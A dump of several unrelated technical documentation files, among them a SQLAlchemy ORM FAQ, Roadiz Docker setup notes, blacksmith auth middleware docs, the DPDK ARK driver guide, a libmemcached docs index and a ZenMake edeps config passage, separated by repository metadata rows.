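```python
from sqlalchemy import Column, ForeignKey, Integer, MetaData, Table

metadata = MetaData()

user = Table("user", metadata, Column("id", Integer, primary_key=True))
account = Table("account", metadata, Column("id", Integer, primary_key=True))

# Marking both association columns primary_key=True yields the composite
# PRIMARY KEY (user_id, account_id) shown in the CREATE TABLE statement.
my_association = Table(
    "my_association", metadata,
    Column("user_id", Integer, ForeignKey("user.id"), primary_key=True),
    Column("account_id", Integer, ForeignKey("account.id"), primary_key=True),
)
```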
How do I configure a Column that is a Python reserved word or similar?
----------------------------------------------------------------------
Column-based attributes can be given any name desired in the mapping. See
:ref:`mapper_column_distinct_names`.
How do I get a list of all columns, relationships, mapped attributes, etc. given a mapped class?
-------------------------------------------------------------------------------------------------
This information is all available from the :class:`_orm.Mapper` object.
To get at the :class:`_orm.Mapper` for a particular mapped class, call the
:func:`_sa.inspect` function on it::
from sqlalchemy import inspect
mapper = inspect(MyClass)
From there, all information about the class can be accessed through properties
such as:
* :attr:`_orm.Mapper.attrs` - a namespace of all mapped attributes. The attributes
themselves are instances of :class:`.MapperProperty`, which contain additional
attributes that can lead to the mapped SQL expression or column, if applicable.
* :attr:`_orm.Mapper.column_attrs` - the mapped attribute namespace
limited to column and SQL expression attributes. You might want to use
:attr:`_orm.Mapper.columns` to get at the :class:`_schema.Column` objects directly.
* :attr:`_orm.Mapper.relationships` - namespace of all :class:`.RelationshipProperty` attributes.
* :attr:`_orm.Mapper.all_orm_descriptors` - namespace of all mapped attributes, plus user-defined
attributes defined using systems such as :class:`.hybrid_property`, :class:`.AssociationProxy` and others.
* :attr:`_orm.Mapper.columns` - A namespace of :class:`_schema.Column` objects and other named
SQL expressions associated with the mapping.
* :attr:`_orm.Mapper.mapped_table` - The :class:`_schema.Table` or other selectable to which
this mapper is mapped.
* :attr:`_orm.Mapper.local_table` - The :class:`_schema.Table` that is "local" to this mapper;
this differs from :attr:`_orm.Mapper.mapped_table` in the case of a mapper mapped
using inheritance to a composed selectable.
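
Putting a few of these accessors together, a short self-contained sketch (the ``User`` / ``Address`` models are invented for illustration):

```python
from sqlalchemy import Column, ForeignKey, Integer, String, inspect
from sqlalchemy.orm import declarative_base, relationship

Base = declarative_base()

class User(Base):
    __tablename__ = "user"
    id = Column(Integer, primary_key=True)
    name = Column(String)
    addresses = relationship("Address")

class Address(Base):
    __tablename__ = "address"
    id = Column(Integer, primary_key=True)
    user_id = Column(Integer, ForeignKey("user.id"))

mapper = inspect(User)

column_names = [attr.key for attr in mapper.column_attrs]  # column attributes
relationship_names = list(mapper.relationships.keys())     # relationship attributes
table_name = mapper.local_table.name                       # the mapped Table
```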
.. _faq_combining_columns:
I'm getting a warning or error about "Implicitly combining column X under attribute Y"
--------------------------------------------------------------------------------------
This condition refers to when a mapping contains two columns that are being
mapped under the same attribute name due to their name, but there's no indication
that this is intentional. A mapped class needs to have explicit names for
every attribute that is to store an independent value; when two columns have the
same name and aren't disambiguated, they fall under the same attribute and
the effect is that the value from one column is **copied** into the other, based
on which column was assigned to the attribute first.
This behavior is often desirable and is allowed without warning in the case
where the two columns are linked together via a foreign key relationship
within an inheritance mapping. When the warning or exception occurs, the
issue can be resolved by either assigning the columns to differently-named
attributes, or if combining them together is desired, by using
:func:`.column_property` to make this explicit.
Given the example as follows::
from sqlalchemy import Integer, Column, ForeignKey
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class A(Base):
__tablename__ = 'a'
id = Column(Integer, primary_key=True)
class B(A):
__tablename__ = 'b'
id = Column(Integer, primary_key=True)
a_id = Column(Integer, ForeignKey('a.id'))
As of SQLAlchemy version 0.9.5, the above condition is detected, and will
warn that the ``id`` column of ``A`` and ``B`` is being combined under
the same-named attribute ``id``, which above is a serious issue since it means
that a ``B`` object's primary key will always mirror that of its ``A``.
A mapping which resolves this is as follows::
class A(Base):
__tablename__ = 'a'
id = Column(Integer, primary_key=True)
class B(A):
__tablename__ = 'b'
b_id = Column('id', Integer, primary_key=True)
a_id = Column(Integer, ForeignKey('a.id'))
Suppose we did want ``A.id`` and ``B.id`` to be mirrors of each other, despite
the fact that ``B.a_id`` is where ``A.id`` is related. We could combine
them together using :func:`.column_property`::
class A(Base):
__tablename__ = 'a'
id = Column(Integer, primary_key=True)
class B(A):
__tablename__ = 'b'
# probably not what you want, but this is a demonstration
id = column_property(Column(Integer, primary_key=True), A.id)
a_id = Column(Integer, ForeignKey('a.id'))
I'm using Declarative and setting primaryjoin/secondaryjoin using an ``and_()`` or ``or_()``, and I am getting an error message about foreign keys.
------------------------------------------------------------------------------------------------------------------------------------------------------------------
Are you doing this?::
class MyClass(Base):
# ....
foo = relationship("Dest", primaryjoin=and_("MyClass.id==Dest.foo_id", "MyClass.foo==Dest.bar"))
That's an ``and_()`` of two string expressions, which SQLAlchemy cannot apply any mapping towards. Declarative allows :func:`_orm.relationship` arguments to be specified as strings, which are converted into expression objects using ``eval()``. But this doesn't occur inside of an ``and_()`` expression - it's a special operation declarative applies only to the *entirety* of what's passed to primaryjoin or other arguments as a string::
class MyClass(Base):
# ....
foo = relationship("Dest", primaryjoin="and_(MyClass.id==Dest.foo_id, MyClass.foo==Dest.bar)")
Or if the objects you need are already available, skip the strings::
class MyClass(Base):
# ....
foo = relationship(Dest, primaryjoin=and_(MyClass.id==Dest.foo_id, MyClass.foo==Dest.bar))
The same idea applies to all the other arguments, such as ``foreign_keys``::
# wrong !
foo = relationship(Dest, foreign_keys=["Dest.foo_id", "Dest.bar_id"])
# correct !
foo = relationship(Dest, foreign_keys="[Dest.foo_id, Dest.bar_id]")
# also correct !
foo = relationship(Dest, foreign_keys=[Dest.foo_id, Dest.bar_id])
# if you're using columns from the class that you're inside of, just use the column objects !
class MyClass(Base):
foo_id = Column(...)
bar_id = Column(...)
# ...
foo = relationship(Dest, foreign_keys=[foo_id, bar_id])
.. _faq_subqueryload_limit_sort:
Why is ``ORDER BY`` recommended with ``LIMIT`` (especially with ``subqueryload()``)?
------------------------------------------------------------------------------------
When ORDER BY is not used for a SELECT statement that returns rows, the
relational database is free to returned matched rows in any arbitrary
order. While this ordering very often corresponds to the natural
order of rows within a table, this is not the case for all databases and all
queries. The consequence of this is that any query that limits rows using
``LIMIT`` or ``OFFSET``, or which merely selects the first row of the result,
discarding the rest, will not be deterministic in terms of what result row is
returned, assuming there's more than one row that matches the query's criteria.
While we may not notice this for simple queries on databases that usually
return rows in their natural order, it becomes more of an issue if we
also use :func:`_orm.subqueryload` to load related collections, and we may not
be loading the collections as intended.
SQLAlchemy implements :func:`_orm.subqueryload` by issuing a separate query,
the results of which are matched up to the results from the first query.
We see two queries emitted like this:
.. sourcecode:: python+sql
>>> session.scalars(select(User).options(subqueryload(User.addresses))).all()
{opensql}-- the "main" query
SELECT users.id AS users_id
FROM users
{stop}
{opensql}-- the "load" query issued by subqueryload
SELECT addresses.id AS addresses_id,
addresses.user_id AS addresses_user_id,
anon_1.users_id AS anon_1_users_id
FROM (SELECT users.id AS users_id FROM users) AS anon_1
JOIN addresses ON anon_1.users_id = addresses.user_id
ORDER BY anon_1.users_id
The second query embeds the first query as a source of rows.
When the inner query uses ``OFFSET`` and/or ``LIMIT`` without ordering,
the two queries may not see the same results:
.. sourcecode:: python+sql
>>> user = session.scalars(select(User).options(subqueryload(User.addresses)).limit(1)).first()
{opensql}-- the "main" query
SELECT users.id AS users_id
FROM users
LIMIT 1
{stop}
{opensql}-- the "load" query issued by subqueryload
SELECT addresses.id AS addresses_id,
addresses.user_id AS addresses_user_id,
anon_1.users_id AS anon_1_users_id
FROM (SELECT users.id AS users_id FROM users LIMIT 1) AS anon_1
JOIN addresses ON anon_1.users_id = addresses.user_id
ORDER BY anon_1.users_id
Depending on database specifics, there is
a chance we may get a result like the following for the two queries::
-- query #1
+--------+
|users_id|
+--------+
| 1|
+--------+
-- query #2
+------------+-----------------+---------------+
|addresses_id|addresses_user_id|anon_1_users_id|
+------------+-----------------+---------------+
| 3| 2| 2|
+------------+-----------------+---------------+
| 4| 2| 2|
+------------+-----------------+---------------+
Above, we receive two ``addresses`` rows for ``user.id`` of 2, and none for
1. We've wasted two rows and failed to actually load the collection. This
is an insidious error because without looking at the SQL and the results, the
ORM will not show that there's any issue; if we access the ``addresses``
for the ``User`` we have, it will emit a lazy load for the collection and we
won't see that anything actually went wrong.
The solution to this problem is to always specify a deterministic sort order,
so that the main query always returns the same set of rows. This generally
means that you should use :meth:`_sql.Select.order_by` with a unique column on the table.
The primary key is a good choice for this::
session.scalars(select(User).options(subqueryload(User.addresses)).order_by(User.id).limit(1)).first()
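The same guarantee can be sketched outside SQLAlchemy with the standard-library ``sqlite3`` module (the table and data below are invented for illustration): once the limited query carries a deterministic ``ORDER BY``, re-executing it (as ``subqueryload`` effectively does) always yields the same row set.

```python
# Plain sqlite3, not SQLAlchemy: demonstrates that ORDER BY makes a
# LIMIT-ed query deterministic across repeated executions.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER)")
conn.executemany("INSERT INTO users VALUES (?)", [(2,), (1,), (3,)])

query = "SELECT id FROM users ORDER BY id LIMIT 1"
first_run = conn.execute(query).fetchall()
second_run = conn.execute(query).fetchall()
# both executions agree because the ordering is deterministic
assert first_run == second_run == [(1,)]
```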
Note that the :func:`_orm.joinedload` eager loader strategy does not suffer from
the same problem because only one query is ever issued, so the load query
cannot be different from the main query. Similarly, the :func:`.selectinload`
eager loader strategy also does not have this issue as it links its collection
loads directly to primary key values just loaded.
.. seealso::
:ref:`subqueryload_ordering`
| 42.319403 | 439 | 0.68597 |
d14023aac7e54a5ddba1d17dd1f101de7d017832 | 1,318 | rst | reStructuredText | src/developer/first-steps/docker.rst | roadiz/docs | 3400ecc235f69458f3f55f4068b8026070ab63ed | [
"MIT"
] | 5 | 2015-04-15T16:09:33.000Z | 2017-04-27T21:16:11.000Z | src/developer/first-steps/docker.rst | roadiz/docs | 3400ecc235f69458f3f55f4068b8026070ab63ed | [
"MIT"
] | 8 | 2015-06-16T13:28:31.000Z | 2019-01-19T10:14:10.000Z | src/developer/first-steps/docker.rst | roadiz/docs | 3400ecc235f69458f3f55f4068b8026070ab63ed | [
"MIT"
] | 7 | 2015-04-28T14:51:50.000Z | 2018-06-14T12:49:12.000Z | .. _docker:
Using Docker for development
============================
Roadiz standard edition is shipped with a ``docker-compose`` example environment ready
to use for development. *Docker* on Linux will provide excellent performance and a production-like environment
without bloating your development machine. Performance won't be as good on *macOS* or *Windows* hosts,
but it will still save you from installing single versions of PHP and MySQL directly on your computer.
First, edit the ``.env`` file and configure it according to your host machine (you can copy it from ``.env.dist``
if it does not exist).
.. code-block:: bash
# Build PHP image
docker-compose build;
# Create and start containers
docker-compose up -d;
Then your website will be available at ``http://localhost:${APP_PORT}``.
For Linux users, where *Docker* runs natively (without underlying virtualization),
note that *PHP* runs as the *www-data* user. You must update your ``.env`` file to
reflect your local user **UID** during the image build.
.. code-block:: bash
# Type id command in your favorite terminal app
id
# It should output something like
# uid=1000(toto)
So use the same UID in your ``.env`` file **before** building and starting your Docker image.
.. code-block:: bash
USER_UID=1000
| 31.380952 | 109 | 0.718513 |
7c7683014d4b048bf6b5c9f81c5f97b9530c497c | 2,019 | rst | reStructuredText | docs/source/user/middleware/authorization.rst | mardiros/blacksmith | c86a870da04b0d916f243cb51f8861529284337d | [
"BSD-3-Clause"
] | 15 | 2022-01-16T15:23:23.000Z | 2022-01-20T21:42:53.000Z | docs/source/user/middleware/authorization.rst | mardiros/blacksmith | c86a870da04b0d916f243cb51f8861529284337d | [
"BSD-3-Clause"
] | 9 | 2022-01-11T19:42:42.000Z | 2022-01-26T20:24:23.000Z | docs/source/user/middleware/authorization.rst | mardiros/blacksmith | c86a870da04b0d916f243cb51f8861529284337d | [
"BSD-3-Clause"
] | null | null | null | .. _`Authentication Middleware`:
Authentication Middleware
=========================
A service may require authentication to authorize HTTP requests.
The authentication part is not part of the contract of a route;
it generally applies to a whole service or even to the whole registry.
For consistency, every service should use the same authorization
pattern.
With blacksmith, the authentication mechanism is declared in the
``AsyncClientFactory`` to get authentication working.
It can also be overridden on every API call.
Example
-------
.. literalinclude:: authorization_bearer.py
In the example above, the bearer token is shared by every client
of the factory, which is fine for a service like Prometheus where the
token is a configuration key, but most of the time a token depends
on the user.
So in the example below, we set the token only on a particular client.
.. literalinclude:: authorization_bearer2.py
In that example, we have a fake web framework that parses the authorization
header and exposes the bearer token under a variable ``request.access_token``,
and we provide the middleware only for the execution of that request.
Create a custom authorization
-----------------------------
Imagine that you have an API that consumes a Basic authentication header.
.. literalinclude:: authorization_basic.py
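Independently of blacksmith's middleware API, the header such a middleware ultimately has to produce is well defined. The following sketch is illustrative only (the helper name is invented, and none of this is blacksmith code): it builds the ``Authorization: Basic ...`` value by base64-encoding ``username:password``.

```python
# Illustrative helper, not part of blacksmith: computes the value of an
# HTTP Basic Authorization header from a username and password.
import base64

def basic_auth_header(username: str, password: str) -> dict:
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return {"Authorization": f"Basic {token}"}

# basic_auth_header("alice", "secret")
# -> {"Authorization": "Basic YWxpY2U6c2VjcmV0"}
```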
Create a custom authentication based on http header
---------------------------------------------------
Imagine that you have an API that consumes an "X-Secret" header to validate calls.
.. literalinclude:: authorization_custom_header.py
Create a custom authentication based on querystring parameter
-------------------------------------------------------------
It is not recommended to pass secrets in a querystring, because
query parameters are often logged by servers, and secrets should never
be logged. For that reason blacksmith does not provide a middleware to handle this
case, but you can still implement it yourself.
See how to implement it in the section :ref:`Generic Middleware`.
| 31.061538 | 79 | 0.729569 |
a7c2590b4b5006604639d7d81b32fc10863b5378 | 10,168 | rst | reStructuredText | libmoon/deps/dpdk/doc/guides/nics/ark.rst | anonReview/Implementation | b86e0c48a1a9183a143687a2875b160504bcb202 | [
"MIT"
] | 4 | 2016-07-31T16:24:45.000Z | 2021-11-22T16:10:39.000Z | libmoon/deps/dpdk/doc/guides/nics/ark.rst | anonReview/Implementation | b86e0c48a1a9183a143687a2875b160504bcb202 | [
"MIT"
] | null | null | null | libmoon/deps/dpdk/doc/guides/nics/ark.rst | anonReview/Implementation | b86e0c48a1a9183a143687a2875b160504bcb202 | [
"MIT"
] | 2 | 2021-06-16T11:30:50.000Z | 2021-09-20T16:53:38.000Z | .. BSD LICENSE
Copyright (c) 2015-2017 Atomic Rules LLC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of Atomic Rules LLC nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
ARK Poll Mode Driver
====================
The ARK PMD is a DPDK poll-mode driver for the Atomic Rules Arkville
(ARK) family of devices.
More information can be found at the `Atomic Rules website
<http://atomicrules.com>`_.
Overview
--------
The Atomic Rules Arkville product is a DPDK- and AXI-compliant product
that marshals packets across a PCIe conduit between host DPDK mbufs and
FPGA AXI streams.
The ARK PMD, and the spirit of the overall Arkville product,
has been to take the DPDK API/ABI as a fixed specification;
then implement much of the business logic in FPGA RTL circuits.
The approach of *working backwards* from the DPDK API/ABI and having
the GPP host software *dictate*, while the FPGA hardware *copes*,
results in significant performance gains over a naive implementation.
While this document describes the ARK PMD software, it is helpful to
understand what the FPGA hardware is and is not. The Arkville RTL
component provides a single PCIe Physical Function (PF) supporting
some number of RX/Ingress and TX/Egress Queues. The ARK PMD controls
the Arkville core through a dedicated opaque Core BAR (CBAR).
To allow users full freedom for their own FPGA application IP,
an independent FPGA Application BAR (ABAR) is provided.
One popular way to imagine Arkville's FPGA hardware aspect is as the
FPGA PCIe-facing side of a so-called Smart NIC. The Arkville core does
not contain any MACs, and is link-speed independent, as well as
agnostic to the number of physical ports the application chooses to
use. The ARK driver exposes the familiar PMD interface to allow packet
movement to and from mbufs across multiple queues.
However FPGA RTL applications could contain a universe of added
functionality that an Arkville RTL core does not provide or cannot
anticipate. To allow for this expectation of user-defined
innovation, the ARK PMD provides a dynamic mechanism of adding
capabilities without having to modify the ARK PMD.
The ARK PMD is intended to support all instances of the Arkville
RTL Core, regardless of configuration, FPGA vendor, or target
board. While specific capabilities such as number of physical
hardware queue-pairs are negotiated; the driver is designed to
remain constant over a broad and extendable feature set.
Intentionally, Arkville by itself DOES NOT provide common NIC
capabilities such as offload or receive-side scaling (RSS).
These capabilities would be viewed as a gate-level "tax" on
Green-box FPGA applications that do not require such function.
Instead, they can be added as needed with essentially no
overhead to the FPGA Application.
The ARK PMD also supports optional user extensions, through dynamic linking.
The ARK PMD user extensions are a feature of Arkville’s DPDK
net/ark poll mode driver, allowing users to add their
own code to extend the net/ark functionality without
having to make source code changes to the driver. One motivation for
this capability is that while DPDK provides a rich set of functions
to interact with NIC-like capabilities (e.g. MAC addresses and statistics),
the Arkville RTL IP does not include a MAC. Users can supply their
own MAC or custom FPGA applications, which may require control from
the PMD. The user extension is the means providing the control
between the user's FPGA application and the existing DPDK features via
the PMD.
Device Parameters
-------------------
The ARK PMD supports device parameters that are used for packet
routing and for internal packet generation and packet checking. This
section describes the supported parameters. These features are
primarily used for diagnostics, testing, and performance verification
under the guidance of an Arkville specialist. The nominal use of
Arkville does not require any configuration using these parameters.
"Pkt_dir"
The Packet Director controls connectivity between Arkville's internal
hardware components. The features of the Pkt_dir are only used for
diagnostics and testing; it is not intended for nominal use. The full
set of features are not published at this level.
Format:
Pkt_dir=0x00110F10
"Pkt_gen"
The packet generator parameter takes a file as its argument. The file
contains configuration parameters used internally for regression
testing and are not intended to be published at this level. The
packet generator is an internal Arkville hardware component.
Format:
Pkt_gen=./config/pg.conf
"Pkt_chkr"
The packet checker parameter takes a file as its argument. The file
contains configuration parameters used internally for regression
testing and are not intended to be published at this level. The
packet checker is an internal Arkville hardware component.
Format:
Pkt_chkr=./config/pc.conf
Data Path Interface
-------------------
Ingress RX and Egress TX operation is via the nominal DPDK API.
The driver supports single-port, multi-queue for both RX and TX.
Refer to ``ark_ethdev.h`` for the list of supported methods to
act upon RX and TX Queues.
Configuration Information
-------------------------
**DPDK Configuration Parameters**
The following configuration options are available for the ARK PMD:
* **CONFIG_RTE_LIBRTE_ARK_PMD** (default y): Enables or disables inclusion
of the ARK PMD driver in the DPDK compilation.
* **CONFIG_RTE_LIBRTE_ARK_PAD_TX** (default y): When enabled TX
packets are padded to 60 bytes to support downstream MACS.
* **CONFIG_RTE_LIBRTE_ARK_DEBUG_RX** (default n): Enables or disables debug
logging and internal checking of RX ingress logic within the ARK PMD driver.
* **CONFIG_RTE_LIBRTE_ARK_DEBUG_TX** (default n): Enables or disables debug
logging and internal checking of TX egress logic within the ARK PMD driver.
* **CONFIG_RTE_LIBRTE_ARK_DEBUG_STATS** (default n): Enables or disables debug
logging of detailed packet and performance statistics gathered in
the PMD and FPGA.
* **CONFIG_RTE_LIBRTE_ARK_DEBUG_TRACE** (default n): Enables or disables debug
logging of detailed PMD events and status.
Building DPDK
-------------
See the :ref:`DPDK Getting Started Guide for Linux <linux_gsg>` for
instructions on how to build DPDK.
By default the ARK PMD library will be built into the DPDK library.
For configuring and using UIO and VFIO frameworks, please also refer :ref:`the
documentation that comes with DPDK suite <linux_gsg>`.
Supported ARK RTL PCIe Instances
--------------------------------
ARK PMD supports the following Arkville RTL PCIe instances including:
* ``1d6c:100d`` - AR-ARKA-FX0 [Arkville 32B DPDK Data Mover]
* ``1d6c:100e`` - AR-ARKA-FX1 [Arkville 64B DPDK Data Mover]
Supported Operating Systems
---------------------------
Any Linux distribution fulfilling the conditions described in the ``System Requirements``
section of :ref:`the DPDK documentation <linux_gsg>`; also refer to the *DPDK
Release Notes*. ARM and PowerPC architectures are not supported at this time.
Supported Features
------------------
* Dynamic ARK PMD extensions
* Multiple receive and transmit queues
* Jumbo frames up to 9K
* Hardware Statistics
Unsupported Features
--------------------
Features that may be part of, or become part of, the Arkville RTL IP that are
not currently supported or exposed by the ARK PMD include:
* PCIe SR-IOV Virtual Functions (VFs)
* Arkville's Packet Generator Control and Status
* Arkville's Packet Director Control and Status
* Arkville's Packet Checker Control and Status
* Arkville's Timebase Management
Pre-Requisites
--------------
#. Prepare the system as recommended by the DPDK suite. This includes environment
variables, hugepage configuration, tool-chains and configuration
#. Insert the igb_uio kernel module using the command ``modprobe igb_uio``
#. Bind the intended ARK device to the igb_uio module
At this point the system should be ready to run DPDK applications. Once the
application runs to completion, the ARK PMD can be detached from igb_uio if necessary.
Usage Example
-------------
Follow instructions available in the document
:ref:`compiling and testing a PMD for a NIC <pmd_build_and_test>` to launch
**testpmd** with Atomic Rules ARK devices managed by librte_pmd_ark.
Example output:
.. code-block:: console
[...]
EAL: PCI device 0000:01:00.0 on NUMA socket -1
EAL: probe driver: 1d6c:100e rte_ark_pmd
EAL: PCI memory mapped at 0x7f9b6c400000
PMD: eth_ark_dev_init(): Initializing 0:2:0.1
ARKP PMD CommitID: 378f3a67
Configuring Port 0 (socket 0)
Port 0: DC:3C:F6:00:00:01
Checking link statuses...
Port 0 Link Up - speed 100000 Mbps - full-duplex
Done
testpmd>
| 38.80916 | 86 | 0.767506 |
820a9f68342a9932d66456ed93f4a2afc71ad85a | 132 | rst | reStructuredText | docs/api/epd_utils_lib/usecase_config.rst | quasi-robotics/easy_perception_deployment | 19f0df36aa94426f81576a0b605718a7d8ac2d12 | [
"Apache-2.0"
] | 40 | 2020-07-10T02:40:09.000Z | 2022-03-28T13:09:00.000Z | docs/api/epd_utils_lib/usecase_config.rst | quasi-robotics/easy_perception_deployment | 19f0df36aa94426f81576a0b605718a7d8ac2d12 | [
"Apache-2.0"
] | 19 | 2020-09-15T14:50:09.000Z | 2022-03-14T12:36:57.000Z | docs/api/epd_utils_lib/usecase_config.rst | cardboardcode/easy_perception_deployment | bf3ba2247fdddd1c6197762a5be453efd7031e02 | [
"Apache-2.0"
] | 8 | 2020-06-29T04:26:57.000Z | 2022-01-07T13:57:26.000Z | .. _api_usecase_config:
usecase_config
==============
.. doxygenfile:: usecase_config.hpp
:project: easy_perception_deployment
| 16.5 | 39 | 0.712121 |
79ce45e259bfc099c00bb58169ce9a331b9f5157 | 1,754 | rst | reStructuredText | Memcached/MCBug5/memcached-127/libmemcached-0.49/docs/index.rst | uditagarwal97/nekara-artifact | b210ccaf751aca6bae7189d4f4db537b6158c525 | [
"MIT"
] | 2 | 2021-07-15T15:58:18.000Z | 2021-07-16T14:37:26.000Z | Memcached/MCBug5/memcached-127/libmemcached-0.49/docs/index.rst | uditagarwal97/nekara-artifact | b210ccaf751aca6bae7189d4f4db537b6158c525 | [
"MIT"
] | null | null | null | Memcached/MCBug5/memcached-127/libmemcached-0.49/docs/index.rst | uditagarwal97/nekara-artifact | b210ccaf751aca6bae7189d4f4db537b6158c525 | [
"MIT"
] | 2 | 2021-07-15T12:19:06.000Z | 2021-09-06T04:28:19.000Z | =========================================
Welcome to the libmemcached documentation
=========================================
------------
Libmemcached
------------
######
Basics
######
.. toctree::
:maxdepth: 1
libmemcached
memcached_create
libmemcached_examples
libmemcached_configuration
#################
Working with data
#################
.. toctree::
:maxdepth: 1
memcached_auto
memcached_delete
memcached_flush_buffers
memcached_flush
memcached_get
memcached_result_st
memcached_set
###############
Advanced Topics
###############
.. toctree::
:maxdepth: 1
memcached_behavior
memcached_callback
memcached_dump
memcached_generate_hash_value
memcached_memory_allocators
memcached_quit
memcached_sasl
memcached_server_st
memcached_servers
memcached_strerror
memcached_user_data
memcached_verbosity
memcached_version
#################
Platform Specific
#################
.. toctree::
:maxdepth: 1
tap
#################################
Deriving statistics from a server
#################################
.. toctree::
:maxdepth: 1
memcached_analyze
memcached_stats
----------------
Libmemcachedutil
----------------
.. toctree::
:maxdepth: 1
libmemcachedutil
memcached_pool
-------------------
Client Applications
-------------------
.. toctree::
:maxdepth: 1
memcapable
memcat
memcp
memdump
memerror
memflush
memrm
memslap
memaslap
memstat
----------
Libhashkit
----------
.. toctree::
:maxdepth: 1
libhashkit
hashkit_create
hashkit_functions
hashkit_value
==================
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
| 13.703125 | 41 | 0.552452 |
76bb84eab3e426b2ff97f0b6d44068916c315cde | 9,750 | rst | reStructuredText | docs/buildconf-edeps.rst | sturmianseq/zenmake | 44f1131c1ab677d8c3c930150c63a7dde4ef7de0 | [
"BSD-3-Clause"
] | null | null | null | docs/buildconf-edeps.rst | sturmianseq/zenmake | 44f1131c1ab677d8c3c930150c63a7dde4ef7de0 | [
"BSD-3-Clause"
] | null | null | null | docs/buildconf-edeps.rst | sturmianseq/zenmake | 44f1131c1ab677d8c3c930150c63a7dde4ef7de0 | [
"BSD-3-Clause"
] | null | null | null | .. include:: global.rst.inc
.. highlight:: python
.. _buildconf-edep-params:
Build config: edeps
=============================
The config parameter ``edeps`` is a :ref:`dict<buildconf-dict-def>` with
configurations of external non-system dependencies.
General description of external dependencies is :ref:`here<dependencies-external>`.
Each such a dependency can have own unique name and parameters:
.. _buildconf-edep-params-rootdir:
rootdir
"""""""""""""""""""""
A path to the root of the dependency project. It should be path to directory
with the build script of the dependency project.
This path can be relative to the :ref:`startdir<buildconf-startdir>` or absolute.
targets
"""""""""""""""""""""
A :ref:`dict<buildconf-dict-def>` with descriptions of targets of the
dependency project. Each target has a reference name which can be used in
:ref:`use<buildconf-taskparams-use>` in the format
``dependency-name:target-reference-name``, and the following parameters:
:dir:
A directory containing the current target file. Usually it's some build directory.
This path can be relative to the :ref:`startdir<buildconf-startdir>` or absolute.
:type:
It's the type of the target file. This type affects the linking of
the build tasks and some other things. Supported types:
:stlib:
The target file is a static library.
:shlib:
The target file is a shared library.
:program:
The target file is an executable file.
:file:
The target file is any file.
:name:
It is the base name of the target file, which is used
to detect the resulting target file name depending on the destination
operating system, selected toolchain, value of ``type``, etc.
If it's not set, the target reference name is used.
:ver-num:
It's a version number for the target file if it is a shared library.
It can have effect on resulting target file name.
:fname:
It's the real file name of the target. Usually it's detected by ZenMake
from other parameters; you can set it manually, but that's not
recommended unless you really need it.
If parameter ``type`` is equal to ``file`` the value of this parameter
is always equal to value of parameter ``name`` by default.
Example in YAML format for non-ZenMake dependency:
.. code-block:: yaml
targets:
# 'shared-lib' and 'static-lib' are target reference names
shared-lib:
dir : ../foo-lib/_build_/debug
type: shlib
name: fooutil
static-lib:
dir : ../foo-lib/_build_/debug
type: stlib
name: fooutil
Example in Python format for non-ZenMake dependency:
.. code-block:: python
'targets': {
# 'shared-lib' and 'static-lib' are target reference names
'shared-lib' : {
'dir' : '../foo-lib/_build_/debug',
'type': 'shlib',
'name': 'fooutil',
},
'static-lib' : {
'dir' : '../foo-lib/_build_/debug',
'type': 'stlib',
'name': 'fooutil',
},
},
.. _buildconf-edep-params-export-includes:
export-includes
"""""""""""""""""""""
A list of paths with 'includes' for C/C++/D/Fortran compilers to export from
the dependency project for all build tasks which depend on the current dependency.
Paths should be relative to the :ref:`startdir<buildconf-startdir>` or
absolute, but the latter is not recommended.
If paths contain spaces and all these paths are listed
in one string then each such a path must be in quotes.
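For example, in YAML format (the paths are purely illustrative):

```yaml
export-includes: [ include, '../foo-lib/include' ]
```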
rules
"""""""""""""""""""""
A :ref:`dict<buildconf-dict-def>` with descriptions of rules to produce
the target files of the dependency. Each rule has its own reserved name and
parameters to run. The allowed rule names are:
``configure``, ``build``, ``test``, ``clean``, ``install``, ``uninstall``.
The parameters for each rule can be a string with a command line to run or
a dict with the attributes:
:cmd:
A command line to run. It can be any suitable command line.
:cwd:
A working directory where to run ``cmd``. By default it's
the :ref:`rootdir<buildconf-edep-params-rootdir>`.
This path can be relative to the :ref:`startdir<buildconf-startdir>` or absolute.
:env:
Environment variables for ``cmd``. It's a ``dict`` where each
key is a name of variable and value is a value of env variable.
:timeout:
A timeout for ``cmd`` in seconds. By default there is no timeout.
:shell:
If shell is True, the specified command will be executed through
the shell. By default it is False.
In some cases it can be set to True by ZenMake even though you
set it to False.
:trigger:
A dict that describes conditions to run the rule.
If any configured trigger returns True then the rule will be run.
You can configure one or more triggers for each rule.
ZenMake supports the following types of trigger:
:always:
If it's True then the rule will always be run. If it's False and
there are no other triggers, the rule will not be run automatically.
:paths-exist:
This trigger returns True only if configured paths exist on
a file system. You can set paths as a string, list of strings or as
a dict like for config task parameter
:ref:`source<buildconf-taskparams-source>`.
Examples in YAML format:
.. code-block:: yaml
trigger:
paths-exist: /etc/fstab
trigger:
paths-exist: [ /etc/fstab, /tmp/somefile ]
trigger:
paths-exist:
startdir: '../foo-lib'
incl: '**/*.label'
Examples in Python format:
